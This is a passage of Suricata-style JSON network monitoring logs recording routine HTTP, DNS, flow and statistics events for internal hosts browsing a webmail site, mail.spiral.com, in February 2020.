Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401},"app_proto":"http","fileinfo":{"filename":"\/js\/colorpicker.js","state":"CLOSED","stored":false,"size":12973,"tx_id":2}} {"timestamp":"2020-02-29T00:01:22.402386+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52638,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/ico_message_off.png","state":"CLOSED","stored":false,"size":468,"tx_id":4}} {"timestamp":"2020-02-29T00:01:22.696950+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/plus.png","state":"CLOSED","stored":false,"size":351,"tx_id":14}} 
{"timestamp":"2020-02-29T00:01:22.698813+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/folder.png","state":"CLOSED","stored":false,"size":211,"tx_id":17}} {"timestamp":"2020-02-29T00:01:23.123898+0000","flow_id":136591399180898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52650,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264}} {"timestamp":"2020-02-29T00:01:23.144741+0000","flow_id":992711525217637,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57146,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50836,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:23.170777+0000","flow_id":136591399180898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52650,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/az.png","state":"CLOSED","stored":false,"size":264,"tx_id":0}} {"timestamp":"2020-02-29T00:01:23.249667+0000","flow_id":992711525217637,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57146,"proto":"UDP","dns":{"type":"answer","id":50836,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:23.249667+0000","flow_id":992711525217637,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57146,"proto":"UDP","dns":{"type":"answer","id":50836,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:23.369326+0000","flow_id":136591399180898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52650,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364}} {"timestamp":"2020-02-29T00:01:23.369326+0000","flow_id":136591399180898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52650,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":240,"tx_id":1}} {"timestamp":"2020-02-29T00:01:23.842322+0000","flow_id":1393011066924782,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34690,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6136},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30698,"tx_id":0}} {"timestamp":"2020-02-29T00:01:23.849154+0000","flow_id":644114799654146,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41023,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5114,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:23.954296+0000","flow_id":644114799654146,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41023,"proto":"UDP","dns":{"type":"answer","id":5114,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:23.954296+0000","flow_id":644114799654146,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41023,"proto":"UDP","dns":{"type":"answer","id":5114,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:01:24.000144+0000","event_type":"stats","stats":{"uptime":13736,"capture":{"kernel_packets":132216,"kernel_drops":0},"decoder":{"pkts":132231,"bytes":91835352,"invalid":176,"ipv4":130810,"ipv6":8,"ethernet":132231,"raw":0,"null":0,"sll":0,"tcp":125852,"udp":4768,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2659,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2675,"synack":2666,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1707,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2173,"failed_udp":106},"tx":{"http":4431,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2249}},"flow_mgr":{"closed_pruned":2636,"new_pruned":15,"est_pruned":2222,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20167,"memcap_state":0,"memcap_global":0},"http":{"memuse":162597,"memcap":0}}} 
{"timestamp":"2020-02-29T00:01:24.001024+0000","flow_id":1683591370237100,"event_type":"flow","src_ip":"192.168.10.81","src_port":52628,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":11,"bytes_toserver":1639,"bytes_toclient":7608,"start":"2020-02-29T00:00:17.779436+0000","end":"2020-02-29T00:00:23.125126+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:24.022214+0000","flow_id":1393011066924782,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3978}} {"timestamp":"2020-02-29T00:01:24.462742+0000","flow_id":2014930921353933,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34692,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6966},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37746,"tx_id":0}} 
{"timestamp":"2020-02-29T00:01:24.471666+0000","flow_id":1948590856745586,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59007,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61595,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:24.576661+0000","flow_id":1948590856745586,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59007,"proto":"UDP","dns":{"type":"answer","id":61595,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:24.576661+0000","flow_id":1948590856745586,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59007,"proto":"UDP","dns":{"type":"answer","id":61595,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:24.660332+0000","flow_id":2014930921353933,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34692,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8105}} {"timestamp":"2020-02-29T00:01:28.331895+0000","flow_id":136591399180898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52650,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":592,"tx_id":1}} {"timestamp":"2020-02-29T00:01:29.000577+0000","flow_id":71243452414947,"event_type":"flow","src_ip":"192.168.10.122","src_port":56790,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:28.621539+0000","end":"2020-02-28T23:56:28.733376+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:29.023050+0000","flow_id":1393011066924782,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34690,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3978},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19145,"tx_id":1}} {"timestamp":"2020-02-29T00:01:29.661634+0000","flow_id":2014930921353933,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34692,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8105},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":33524,"tx_id":1}} {"timestamp":"2020-02-29T00:01:29.964448+0000","flow_id":943744603502432,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58746,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":37232,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:30.077302+0000","flow_id":943744603502432,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58746,"proto":"UDP","dns":{"type":"answer","id":37232,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:30.077302+0000","flow_id":943744603502432,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58746,"proto":"UDP","dns":{"type":"answer","id":37232,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:30.169791+0000","flow_id":679183207983578,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34694,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":18979}} 
{"timestamp":"2020-02-29T00:01:31.000234+0000","event_type":"stats","stats":{"uptime":13743,"capture":{"kernel_packets":132263,"kernel_drops":0},"decoder":{"pkts":132278,"bytes":91855239,"invalid":176,"ipv4":130857,"ipv6":8,"ethernet":132278,"raw":0,"null":0,"sll":0,"tcp":125893,"udp":4774,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2660,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2676,"synack":2667,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1708,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2176,"failed_udp":106},"tx":{"http":4435,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2252}},"flow_mgr":{"closed_pruned":2637,"new_pruned":15,"est_pruned":2222,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20498,"memcap_state":0,"memcap_global":0},"http":{"memuse":190556,"memcap":0}}} 
{"timestamp":"2020-02-29T00:01:32.000295+0000","flow_id":2134528561762561,"event_type":"flow","src_ip":"192.168.10.122","src_port":56514,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:56:31.315649+0000","end":"2020-02-28T23:56:31.423684+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:33.000227+0000","flow_id":285721234508130,"event_type":"flow","src_ip":"192.168.10.122","src_port":59579,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:32.657762+0000","end":"2020-02-28T23:56:32.766092+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:33.000465+0000","flow_id":1885441933501218,"event_type":"flow","src_ip":"192.168.10.122","src_port":49099,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:32.844578+0000","end":"2020-02-28T23:56:32.956150+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:33.000662+0000","flow_id":1923147451373618,"event_type":"flow","src_ip":"192.168.10.122","src_port":34286,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:32.235570+0000","end":"2020-02-28T23:56:32.347026+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:01:34.000690+0000","flow_id":1913015623544439,"event_type":"flow","src_ip":"192.168.10.122","src_port":35939,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:32.978551+0000","end":"2020-02-28T23:56:33.086800+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:35.000485+0000","flow_id":43983295356035,"event_type":"flow","src_ip":"192.168.10.122","src_port":46502,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:56:34.269443+0000","end":"2020-02-28T23:56:34.377451+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:35.000762+0000","flow_id":2204137096906147,"event_type":"flow","src_ip":"192.168.10.122","src_port":40372,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:56:34.099747+0000","end":"2020-02-28T23:56:34.211348+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:35.170866+0000","flow_id":679183207983578,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34694,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":18979},"app_proto":"http","fileinfo":{"filename":"\/turba\/add.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} 
{"timestamp":"2020-02-29T00:01:36.000552+0000","flow_id":76715215099822,"event_type":"flow","src_ip":"192.168.10.130","src_port":33908,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":54,"pkts_toclient":68,"bytes_toserver":5107,"bytes_toclient":83382,"start":"2020-02-28T23:49:57.202670+0000","end":"2020-02-28T23:51:32.624050+0000","age":95,"state":"established","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1a","tcp_flags_tc":"1f","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"fin_wait2"}} {"timestamp":"2020-02-29T00:01:37.000831+0000","flow_id":1537012727240391,"event_type":"flow","src_ip":"192.168.10.81","src_port":52634,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":8,"bytes_toserver":1283,"bytes_toclient":6321,"start":"2020-02-29T00:00:31.218823+0000","end":"2020-02-29T00:00:36.480214+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:01:38.000216+0000","event_type":"stats","stats":{"uptime":13750,"capture":{"kernel_packets":132316,"kernel_drops":0},"decoder":{"pkts":132320,"bytes":91877900,"invalid":176,"ipv4":130897,"ipv6":8,"ethernet":132320,"raw":0,"null":0,"sll":0,"tcp":125931,"udp":4776,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094464},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2661,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2677,"synack":2668,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1709,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2177,"failed_udp":106},"tx":{"http":4436,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2253}},"flow_mgr":{"closed_pruned":2637,"new_pruned":15,"est_pruned":2231,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":2,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65531,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18184,"memcap_state":0,"memcap_global":0},"http":{"memuse":37285,"memcap":0}}} 
{"timestamp":"2020-02-29T00:01:44.000388+0000","flow_id":2150733489452806,"event_type":"flow","src_ip":"192.168.10.81","src_port":52636,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1393,"bytes_toclient":6321,"start":"2020-02-29T00:00:37.866054+0000","end":"2020-02-29T00:00:43.093966+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:45.000183+0000","event_type":"stats","stats":{"uptime":13757,"capture":{"kernel_packets":132316,"kernel_drops":0},"decoder":{"pkts":132320,"bytes":91877900,"invalid":176,"ipv4":130897,"ipv6":8,"ethernet":132320,"raw":0,"null":0,"sll":0,"tcp":125931,"udp":4776,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2661,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2677,"synack":2668,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1709,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2177,"failed_udp":106},"tx":{"http":4436,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2253}},"flow_mgr":{"closed_pruned":2638,"new_pruned":15,"est_pruned":2231,"bypasse
